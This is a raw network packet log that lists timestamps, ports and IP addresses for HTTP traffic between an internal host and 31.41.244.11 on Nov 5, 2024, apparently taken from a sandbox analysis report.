Nov 5, 2024 18:46:08.472049952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472049952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472091913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472120047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472130060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472141027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472166061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472184896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472214937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472224951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472234964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472246885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472270012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472284079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472295046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472296000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472315073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472337008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491355896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491380930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491399050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491400957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491410971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491425037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491452932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491472960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491534948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491534948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491544008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491549015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491578102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491619110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491627932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491636992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491647005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491656065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491673946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491708994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491719961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491749048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491761923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491771936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491780043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491802931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491822004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491842985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491858006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491867065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491884947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491910934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.491942883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491952896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491959095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.491993904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492052078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492068052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492078066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492094040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492114067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492119074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492122889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492142916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492166042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492186069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492225885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492227077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492235899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492263079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492312908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492321968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492331028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492341995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492352009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492357969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492372990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492391109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492582083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492624044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492650986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492686987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492701054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492714882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492742062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492772102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492783070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492791891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492799044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492808104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492815018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492819071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492836952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492856979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492863894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492872953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492882013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492903948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492913008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492918015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492923975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492955923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.492981911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.492993116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493002892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493010998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493027925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493033886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493043900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493052959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493065119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493072033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493089914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493107080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493109941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493120909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493150949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493166924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493177891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493206978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493298054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493307114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493316889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493339062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493355036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493367910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493377924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493383884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493387938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493393898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493408918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493436098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493437052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493447065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493473053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493566036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493607998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493613005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493624926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493652105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493659973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493662119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493678093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493680954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493685961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493706942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493726969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493738890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493750095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493761063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493779898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493794918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.493813992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493830919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.493859053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.494029045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494039059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494050026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494076967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.494095087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494101048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.494107008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494117022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.494138002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.494163036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.591906071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.591926098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.591938019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.591976881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592010975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592019081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592021942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592044115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592066050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592904091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592915058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592925072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592935085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592952013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592983961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.592989922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.592999935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593009949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593019962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593030930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593053102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593113899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593125105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593133926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593144894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593153954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593189955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593234062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593242884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593251944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593261957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593274117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593277931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593283892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593295097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593305111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593306065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593334913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593343973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593724012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593734980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593745947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593769073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593796968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593801022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593808889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593817949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593828917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593842030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593882084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.593974113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593983889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593993902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.593998909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594003916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594016075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594026089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594038010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594038963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594059944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594079971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594134092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594142914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594153881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594161987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594182968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594198942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594214916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594223976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594225883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594235897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594245911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594254971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594293118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594320059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594320059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594331026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594340086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594348907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594357967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594367027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594373941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594377041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594393015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594409943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594418049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594434023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594444990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594449997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594463110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594489098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594525099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594536066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594547033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594557047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594567060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594568968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594583035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594593048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594594955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.594615936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.594643116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.609075069 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.609514952 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.609533072 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.610033989 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.610040903 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.613109112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613137007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613146067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613162041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613187075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613188982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613228083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613231897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613255024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613262892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613293886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613312006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613323927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613359928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613439083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613447905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613467932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613478899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613478899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613488913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613504887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613512993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613523006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.613534927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613548994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.613573074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614397049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614412069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614423037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614434004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614455938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614475012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614496946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614507914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614517927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614527941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614541054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614561081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614563942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614571095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614602089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614624977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614645004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614655972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614665031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614675045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614685059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614687920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614687920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614712000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614737988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614768028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614778042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614788055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614801884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614801884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614815950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614821911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614825010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614835978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.614842892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.614871979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615150928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615194082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615205050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615245104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615278959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615288973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615299940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615318060 CET	80	49804	31.41.244.11	192.168.2.4
